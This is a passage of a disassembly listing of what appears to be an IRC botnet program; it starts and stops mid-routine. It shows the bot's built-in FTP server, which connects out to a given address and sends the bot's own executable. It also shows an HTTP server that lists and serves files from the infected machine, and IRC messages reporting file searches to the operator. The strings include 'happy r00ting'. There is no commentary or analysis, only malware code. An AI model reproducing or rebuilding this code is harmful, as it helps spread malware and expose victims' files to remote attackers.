push offset aXX ; "%x%x\n"
push eax
call sub_41B886
push 10h
lea eax, [ebp+var_FC]
push esi
push eax
call sub_41BDC5
add esp, 1Ch
mov [ebp+var_C], eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_3C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_41B886
add esp, 18h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_40EF89
; ---------------------------------------------------------------------------
loc_40EE6B: ; CODE XREF: sub_40E992+41D�j
lea eax, [ebp+var_B0]
push offset aRetr ; "RETR"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40EF6A
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+arg_0]
call ebx ; send
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
call sub_40EFBF
pop ecx
cmp eax, 1
pop ecx
jnz loc_40EF60
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferSta ; "ftp transfer started to: %s"
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40EEED
push esi
lea eax, [ebp+var_8E0]
push [ebp+var_448]
push eax
lea eax, [ebp+var_4C8]
push eax
push [ebp+var_6E0]
call sub_409A73
add esp, 14h
loc_40EEED: ; CODE XREF: sub_40E992+536�j
call sub_40F03C
cmp eax, 1
jnz loc_40EF8E
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+arg_0]
call ebx ; send
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferCom ; "ftp transfer complete to: %s"
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40EF4B
push esi
lea eax, [ebp+var_8E0]
push [ebp+var_448]
push eax
lea eax, [ebp+var_4C8]
push eax
push [ebp+var_6E0]
call sub_409A73
add esp, 14h
loc_40EF4B: ; CODE XREF: sub_40E992+594�j
lea eax, [ebp+var_8E0]
push eax
call sub_4151AD
inc ds:dword_4CE160
pop ecx
jmp short loc_40EF8E
; ---------------------------------------------------------------------------
loc_40EF60: ; CODE XREF: sub_40E992+512�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40EF89
; ---------------------------------------------------------------------------
loc_40EF6A: ; CODE XREF: sub_40E992+4EE�j
lea eax, [ebp+var_B0]
push offset aQuit ; "QUIT"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40EF8E
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_40EF89: ; CODE XREF: sub_40E992+340�j
; sub_40E992+377�j ...
push [ebp+arg_0]
loc_40EF8C: ; CODE XREF: sub_40E992+304�j
call ebx ; send
loc_40EF8E: ; CODE XREF: sub_40E992+3C2�j
; sub_40E992+563�j ...
push 64h
lea eax, [ebp+var_2A0]
push esi
push eax
call sub_41B590
mov edi, [ebp+arg_0]
add esp, 0Ch
loc_40EFA3: ; CODE XREF: sub_40E992+151�j
; sub_40E992+17A�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40EAB1
jmp loc_40EA76
; ---------------------------------------------------------------------------
loc_40EFB5: ; CODE XREF: sub_40E992+10F�j
push 1
pop eax
loc_40EFB8: ; CODE XREF: sub_40E992+C1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40E992 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EFBF proc near ; CODE XREF: sub_40E992+508�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call dword_4271F0 ; WSAStartup
push 0
push 1
push 2
call dword_427220 ; socket
push [ebp+arg_0]
mov ds:dword_4CE3A8, eax
mov [ebp+var_10], 2
call dword_42720C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_427210 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_4CE3A8
call dword_427214 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40F037
push ds:dword_4CE3A8
call dword_42721C ; closesocket
call dword_4271EC ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40F037: ; CODE XREF: sub_40EFBF+60�j
push 1
pop eax
leave
retn
sub_40EFBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F03C proc near ; CODE XREF: sub_40E992:loc_40EEED�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call dword_427070 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_429068
push eax
call sub_41B4C2
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40F0D3
test byte ptr [esi+0Ch], 10h
jnz short loc_40F0B7
push edi
mov edi, 400h
loc_40F07F: ; CODE XREF: sub_40F03C+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_41B11A
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push ds:dword_4CE3A8
call dword_427224 ; send
push 1
call dword_427078 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_40F07F
pop edi
loc_40F0B7: ; CODE XREF: sub_40F03C+3B�j
push esi
call sub_41B05B
pop ecx
push ds:dword_4CE3A8
call dword_42721C ; closesocket
call dword_4271EC ; WSACleanup
push 1
pop eax
loc_40F0D3: ; CODE XREF: sub_40F03C+35�j
pop esi
leave
retn
sub_40F03C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F0D6 proc near ; DATA XREF: sub_401ACD+2284�o
; sub_40BACE+475�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_41BB20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
mov [ebp+var_14], esi
call sub_41B590
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call ds:dword_4CB654 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call ds:dword_4CB6D4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_40F4C1
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_43E59C[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_4CB680 ; bind
cmp eax, 0FFFFFFFFh
jz loc_40F4C1
push 7FFFFFFFh
push edi
call ds:dword_4CB67C ; listen
cmp eax, 0FFFFFFFFh
jz loc_40F4C1
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call ds:dword_4CB6F0 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_40F4C1
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_40F1AD: ; CODE XREF: sub_40F0D6+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call ds:dword_4CB63C ; select
cmp eax, 0FFFFFFFFh
jz loc_40F4BC
xor esi, esi
mov [ebp+var_4], esi
loc_40F1E3: ; CODE XREF: sub_40F0D6+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call ds:dword_4CB540 ; __WSAFDIsSet
test eax, eax
jz loc_40F4A7
cmp esi, [ebp+var_C]
jnz short loc_40F265
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call ds:dword_4CB6E8 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40F4A7
xor ecx, ecx
test ebx, ebx
jbe short loc_40F237
lea edx, [ebp+var_134]
loc_40F22B: ; CODE XREF: sub_40F0D6+15F�j
cmp [edx], eax
jz short loc_40F237
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_40F22B
loc_40F237: ; CODE XREF: sub_40F0D6+14D�j
; sub_40F0D6+157�j
cmp ecx, ebx
jnz short loc_40F254
cmp ebx, 40h
jnb short loc_40F254
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_40F254: ; CODE XREF: sub_40F0D6+163�j
; sub_40F0D6+168�j
cmp eax, [ebp+var_8]
jbe loc_40F4A7
mov [ebp+var_8], eax
jmp loc_40F4A7
; ---------------------------------------------------------------------------
loc_40F265: ; CODE XREF: sub_40F0D6+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_41B590
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_41B590
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call ds:dword_4CB66C ; recv
test eax, eax
jg short loc_40F2F8
push esi
call ds:dword_4CB6EC ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_40F4A7
lea eax, [ebp+var_134]
loc_40F2B7: ; CODE XREF: sub_40F0D6+1EB�j
cmp [eax], esi
jz short loc_40F2C8
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40F2B7
jmp loc_40F4A7
; ---------------------------------------------------------------------------
loc_40F2C8: ; CODE XREF: sub_40F0D6+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40F2EC
lea eax, [ebp+ecx*4+var_134]
loc_40F2D6: ; CODE XREF: sub_40F0D6+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40F2D6
loc_40F2EC: ; CODE XREF: sub_40F0D6+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_40F4A7
; ---------------------------------------------------------------------------
loc_40F2F8: ; CODE XREF: sub_40F0D6+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_41B590
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_41AFE0
add esp, 10h
test eax, eax
jbe loc_40F4A7
loc_40F326: ; CODE XREF: sub_40F0D6+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_40F3CB
mov esi, offset aGet_0 ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_40F39F
lea eax, [ebp+var_18F0]
push eax
call sub_41AFE0
cmp eax, 5
pop ecx
jbe short loc_40F39F
mov eax, offset asc_42D128 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_41B900
pop ecx
pop ecx
push eax
call sub_41B900
pop ecx
pop ecx
push eax
call sub_41C0F4
push eax
lea eax, [ebp+var_23C]
push eax
call sub_41BEB0
add esp, 10h
jmp short loc_40F3B6
; ---------------------------------------------------------------------------
loc_40F39F: ; CODE XREF: sub_40F0D6+27F�j
; sub_40F0D6+291�j
lea eax, [ebp+var_18F0]
push offset asc_433F14 ; "\r\n"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_40F3EA
loc_40F3B6: ; CODE XREF: sub_40F0D6+2C7�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_41B590
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40F3CB: ; CODE XREF: sub_40F0D6+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_41AFE0
cmp [ebp+arg_0], eax
pop ecx
jb loc_40F326
jmp loc_40F4A7
; ---------------------------------------------------------------------------
loc_40F3EA: ; CODE XREF: sub_40F0D6+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_40F434
lea eax, [ebp+var_134]
loc_40F3F6: ; CODE XREF: sub_40F0D6+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_40F407
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40F3F6
jmp short loc_40F437
; ---------------------------------------------------------------------------
loc_40F407: ; CODE XREF: sub_40F0D6+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40F42B
lea eax, [ebp+ecx*4+var_134]
loc_40F415: ; CODE XREF: sub_40F0D6+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40F415
loc_40F42B: ; CODE XREF: sub_40F0D6+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_40F437
; ---------------------------------------------------------------------------
loc_40F434: ; CODE XREF: sub_40F0D6+318�j
mov esi, [ebp+var_4]
loc_40F437: ; CODE XREF: sub_40F0D6+32F�j
; sub_40F0D6+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_40F4A0
lea eax, [ebp+var_360]
push eax
call sub_41AFE0
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_41AFE0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_40F4A0
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call ds:dword_4CB6F0 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_40F6B4
add esp, 14h
jmp short loc_40F4A7
; ---------------------------------------------------------------------------
loc_40F4A0: ; CODE XREF: sub_40F0D6+369�j
; sub_40F0D6+38F�j
push esi
call ds:dword_4CB6EC ; closesocket
loc_40F4A7: ; CODE XREF: sub_40F0D6+11D�j
; sub_40F0D6+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_40F1E3
jmp loc_40F1AD
; ---------------------------------------------------------------------------
loc_40F4BC: ; CODE XREF: sub_40F0D6+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_40F4C1: ; CODE XREF: sub_40F0D6+6A�j
; sub_40F0D6+92�j ...
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_433EEC
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_40F507
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_409A73
add esp, 14h
loc_40F507: ; CODE XREF: sub_40F0D6+40C�j
lea eax, [ebp+var_8F0]
push eax
call sub_4151AD
pop ecx
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_254]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
pop edi
pop esi
pop ebx
sub_40F0D6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F531 proc near ; DATA XREF: sub_40F6B4+24D�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_41BB20
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax
lea eax, [ebp+var_654]
push eax
call sub_41B886
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_40F597
push offset aTextHtml ; "text/html"
jmp short loc_40F59C
; ---------------------------------------------------------------------------
loc_40F597: ; CODE XREF: sub_40F531+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_40F59C: ; CODE XREF: sub_40F531+64�j
lea eax, [ebp+var_9C]
push eax
call sub_41B886
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call dword_427104 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call dword_427100 ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_40F615
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_41B886
add esp, 24h
jmp short loc_40F636
; ---------------------------------------------------------------------------
loc_40F615: ; CODE XREF: sub_40F531+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_41B886
add esp, 28h
loc_40F636: ; CODE XREF: sub_40F531+E2�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call ds:dword_4CB6A4 ; send
cmp [ebp+var_A4], edi
jnz short loc_40F676
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_40FFF1
pop ecx
pop ecx
jmp short loc_40F693
; ---------------------------------------------------------------------------
loc_40F676: ; CODE XREF: sub_40F531+12D�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_40F96B
add esp, 10h
loc_40F693: ; CODE XREF: sub_40F531+143�j
push [ebp+var_44C]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_B4]
call sub_40B413
pop ecx
push edi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_40F531 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F6B4 proc near ; CODE XREF: sub_40F0D6+3C0�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_41B590
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_40F6EA
push eax
push offset aS_3 ; "\\%s"
jmp short loc_40F6F3
; ---------------------------------------------------------------------------
loc_40F6EA: ; CODE XREF: sub_40F6B4+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_2 ; "%s"
loc_40F6F3: ; CODE XREF: sub_40F6B4+34�j
lea eax, [ebp+var_10C]
push eax
call sub_41B886
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_41AFE0
test eax, eax
pop ecx
jbe short loc_40F78E
mov [ebp+arg_8], 2
loc_40F71E: ; CODE XREF: sub_40F6B4+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_41AFE0
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_40F75E
cmp [ebp+esi+var_10C], 25h
jnz short loc_40F75E
cmp [ebp+esi+var_10B], 32h
jnz short loc_40F75E
cmp [ebp+esi+var_10A], 30h
jnz short loc_40F75E
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_40F778
; ---------------------------------------------------------------------------
loc_40F75E: ; CODE XREF: sub_40F6B4+7A�j
; sub_40F6B4+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_40F76E
push 5Ch
pop eax
jmp short loc_40F771
; ---------------------------------------------------------------------------
loc_40F76E: ; CODE XREF: sub_40F6B4+B3�j
movsx eax, al
loc_40F771: ; CODE XREF: sub_40F6B4+B8�j
mov [ebp+ebx+var_210], al
loc_40F778: ; CODE XREF: sub_40F6B4+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_41AFE0
cmp esi, eax
pop ecx
jb short loc_40F71E
loc_40F78E: ; CODE XREF: sub_40F6B4+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset dword_429AD0
push eax
call sub_41B886
lea eax, [ebp+var_314]
push offset asc_42A0A4 ; "\n"
push eax
call sub_41C0F4
add esp, 18h
lea eax, [ebp+var_314]
push eax
call dword_427098 ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_40F7DF
cmp eax, 0FFFFFFFFh
jnz short loc_40F7E2
push [ebp+arg_0]
jmp loc_40F862
; ---------------------------------------------------------------------------
loc_40F7DF: ; CODE XREF: sub_40F6B4+11C�j
mov [ebp+var_4], esi
loc_40F7E2: ; CODE XREF: sub_40F6B4+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_40F7EF
mov [ebp+var_4], esi
loc_40F7EF: ; CODE XREF: sub_40F6B4+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_40F86D
cmp [ebp+arg_C], edi
jz short loc_40F861
lea eax, [ebp+var_314]
push offset asc_4341A0 ; "*"
push eax
call sub_41BEC0
pop ecx
lea eax, [ebp+var_314]
pop ecx
push eax
lea eax, [ebp+var_640]
push eax
call sub_41B886
lea eax, [ebp+var_210]
push eax
call sub_4100AE
add esp, 0Ch
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_41B886
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_40F8BC
; ---------------------------------------------------------------------------
loc_40F861: ; CODE XREF: sub_40F6B4+152�j
push ebx
loc_40F862: ; CODE XREF: sub_40F6B4+126�j
call ds:dword_4CB6EC ; closesocket
jmp loc_40F964
; ---------------------------------------------------------------------------
loc_40F86D: ; CODE XREF: sub_40F6B4+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call dword_4270EC ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40F8BC
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_41B886
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call dword_427108 ; GetFileSize
push esi
mov [ebp+var_330], eax
call dword_427068 ; CloseHandle
loc_40F8BC: ; CODE XREF: sub_40F6B4+1AB�j
; sub_40F6B4+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_43416C
push eax
call sub_41B886
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_40B0F7
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_43E594[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_40F531
push edi
push edi
call dword_42707C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_43E5A4[ecx], eax
jz short loc_40F936
loc_40F924: ; CODE XREF: sub_40F6B4+280�j
cmp [ebp+var_318], edi
jnz short loc_40F964
push 5
call dword_427078 ; Sleep
jmp short loc_40F924
; ---------------------------------------------------------------------------
loc_40F936: ; CODE XREF: sub_40F6B4+26E�j
push ebx
call ds:dword_4CB6EC ; closesocket
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset unk_434134
push eax
call sub_41B886
lea eax, [ebp+var_8C4]
push eax
call sub_4151AD
add esp, 10h
loc_40F964: ; CODE XREF: sub_40F6B4+1B4�j
; sub_40F6B4+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40F6B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F96B proc near ; CODE XREF: sub_401ACD+777B�p
; sub_40F531+15A�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_41B590
mov edi, [ebp+arg_0]
push offset asc_42A0A4 ; "\n"
push edi
call sub_41C0F4
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_40F9CA
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_41B980
add esp, 14h
jmp loc_40FAC9
; ---------------------------------------------------------------------------
loc_40F9CA: ; CODE XREF: sub_40F96B+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_40FAAF
call sub_41AFE0
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41B980
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
push edi
call sub_41AFE0
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41B980
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41B980
add esp, 0Ch
jmp short loc_40FAC9
; ---------------------------------------------------------------------------
loc_40FAAF: ; CODE XREF: sub_40F96B+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41B980
add esp, 10h
loc_40FAC9: ; CODE XREF: sub_40F96B+5A�j
; sub_40F96B+142�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
